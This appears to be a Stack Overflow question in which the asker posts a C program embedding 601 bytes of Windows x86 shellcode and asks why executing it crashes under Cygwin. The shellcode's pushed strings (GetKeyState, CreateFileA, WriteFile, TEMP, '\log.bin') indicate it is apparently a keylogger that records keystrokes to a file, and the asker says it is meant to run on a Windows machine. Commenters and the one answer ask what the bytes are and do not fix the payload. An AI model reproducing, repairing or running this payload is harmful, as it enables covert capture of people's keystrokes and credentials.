# Stackdump - compiled .c code

Tags: c, exe, stack-dump

If I execute the following code, it´s prin this stack dump error message:

```
1 [main] MyProg 10876 cygwin_exception::open_stackdumpfile: Dumping stack trace to MyProg.exe.stackdump
```

after it prints

```
Shellcode length: 601
```

Can you say me, what I should change, to get it working?
I have compiled it with Sublime Text and cygwin on Windows 10 64bit.

This is the code:

```
#include <stdio.h>
#include <string.h>

const char sc[] = "\xfc\x31\xd2\xb2\x30\x64\xff\x32\x5a\x8b\x52\x0c\x8b\x52\x14\x8b"
    "\x72\x28\x31\xc0\x89\xc1\xb1\x03\xac\xc1\xc0\x08\xac\xe2\xf9\xac"
    "\x3d\x4e\x52\x45\x4b\x74\x05\x3d\x6e\x72\x65\x6b\x8b\x5a\x10\x8b"
    "\x12\x75\xdc\x8b\x53\x3c\x01\xda\xff\x72\x34\x8b\x52\x78\x01\xda"
    "\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74"
    "\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64"
    "\x64\x72\x65\x75\xe2\x49\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x8b"
    "\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x89\xd7\x52\x31\xc0\x50\x68"
    "\x64\x6c\x65\x41\x68\x65\x48\x61\x6e\x68\x6f\x64\x75\x6c\x68\x47"
    "\x65\x74\x4d\x54\x53\xff\xd7\x8d\x64\x24\x14\x50\x68\x4c\x4c\x01"
    "\x88\xfe\x4c\x24\x02\x68\x33\x32\x2e\x44\x68\x55\x53\x45\x52\x54"
    "\xff\xd0\x31\xd2\x39\xd0\x75\x38\x8d\x64\x24\x0c\x52\x68\x61\x72"
    "\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\xd7"
    "\x8d\x64\x24\x10\x50\x68\x4c\x4c\x01\x77\xfe\x4c\x24\x02\x68\x33"
    "\x32\x2e\x44\x68\x55\x53\x45\x52\x54\xff\xd0\x8d\x64\x24\x0c\x50"
    "\x89\xc2\x68\x61\x74\x65\x01\xfe\x4c\x24\x03\x68\x65\x79\x53\x74"
    "\x68\x47\x65\x74\x4b\x54\x52\xff\xd7\x8d\x64\x24\x0c\x50\x68\x65"
    "\x01\x01\x55\xfe\x4c\x24\x01\x68\x65\x46\x69\x6c\x68\x57\x72\x69"
    "\x74\x54\x53\xff\xd7\x8d\x64\x24\x0c\x50\x68\x6c\x65\x41\x01\xfe"
    "\x4c\x24\x03\x68\x74\x65\x46\x69\x68\x43\x72\x65\x61\x54\x53\xff"
    "\xd7\x8d\x64\x24\x0c\x50\x68\x6c\x65\x41\x01\xfe\x4c\x24\x03\x68"
    "\x72\x69\x61\x62\x68\x6e\x74\x56\x61\x68\x6f\x6e\x6d\x65\x68\x6e"
    "\x76\x69\x72\x68\x47\x65\x74\x45\x54\x53\xff\xd7\x8d\x64\x24\x18"
    "\x50\x6a\x70\x68\x53\x6c\x65\x65\x54\x53\xff\xd7\x8d\x64\x24\x08"
    "\x50\x52\x68\x63\x61\x74\x41\x68\x6c\x73\x74\x72\x54\x53\xff\xd7"
    "\x8d\x64\x24\x0c\x50\x31\xc9\xb1\x0e\x51\xe2\xfd\x51\x68\x54\x45"
    "\x4d\x50\x89\xe1\x6a\x40\x51\x51\xff\x54\x24\x54\x89\xe2\x6a\x01"
    "\xfe\x0c\x24\x68\x2e\x62\x69\x6e\x68\x5c\x6c\x6f\x67\x89\xe1\x51"
    "\x52\xff\x54\x24\x54\x31\xc9\x51\x51\x80\x04\x24\x80\x6a\x04\x51"
    "\x6a\x02\x51\x80\x04\x24\x04\x50\xff\x54\x24\x74\x8d\x64\x24\x4c"
    "\x50\x31\xc9\x89\xce\xb1\x08\x56\xe2\xfd\x31\xc9\x31\xf6\x6a\x08"
    "\xff\x54\x24\x2c\x89\xf0\x3c\xff\x73\xf0\x46\x56\xff\x54\x24\x3c"
    "\x89\xf2\x31\xc9\xb1\x80\x21\xc8\x31\xc9\x39\xc8\x75\x10\x31\xd2"
    "\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xb3\x14\x84\xeb\xd6\x31\xd2"
    "\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xa3\x14\x84\x72\xc6\x31\xd2"
    "\x89\xd1\x89\xf0\xb1\x20\xf7\xf1\x0f\xab\x14\x84\x31\xc9\x56\x51"
    "\x8d\x0c\x24\x51\x6a\x01\x8d\x4c\x24\x0c\x51\xff\x74\x24\x34\xff"
    "\x54\x24\x4c\x8d\x64\x24\x04\xeb\x91";

int main(int argc, char *argv[]){
printf("Shellcode length: %d\n", (int)strlen(sc));
(*(void(*)(void))&sc)();
return 0;
}
```

Comment: What do you expect to happen? This looks like a mess.

Comment: Learning how to format your code is a good start. Let apart we are no debugging service for obfuscated code.

Comment: @ChristopherSchneider Is it better now?

Comment: @Olaf is this format better?

Comment: Please explain this line to me: `(*(void(*)(void))&sc)();`

Comment: Note: SublimeText is an IDE, cycwin a Linux-Emulator. None can compile a program.

Comment: @Olaf Yeah, sorry I am not a pro, then explain me please how I can compile a  .c program on windows 10

Comment: Start a vitual machine with Linux and use that. But it would be easier to wipe the disc and install Linux directly :-)

Comment: Ok thank you, I will do it next time, but this program should be run on a windows machine, so I was thinking I can compile it directly there

Answer (score 0):

This: `(*(void(*)(void))&sc)();`

You're taking a pointer to the first element of a `const char[]`, casting it to a function pointer and attempting to execute that function.

I can't honestly imagine that ever succeeding.... the only way I can think of to 'get it working', since I have no idea what your intention is, is to *not* cast `const char` pointer and attempt to execute it as a function.

If you just want a pointer to a function, this is easy:

```
void sc (void)
{
    // do things
}

int main (void)
{
    void (*fptr)(void);

    fptr = sc;
    fptr();
}
```

Comment: Oh sorry it must be "unsigned char[]", what should I do then?

Comment: I have no idea, you haven't given nearly enough information. You could start by explaining how you got the contents of `sc`, and what it's supposed to be.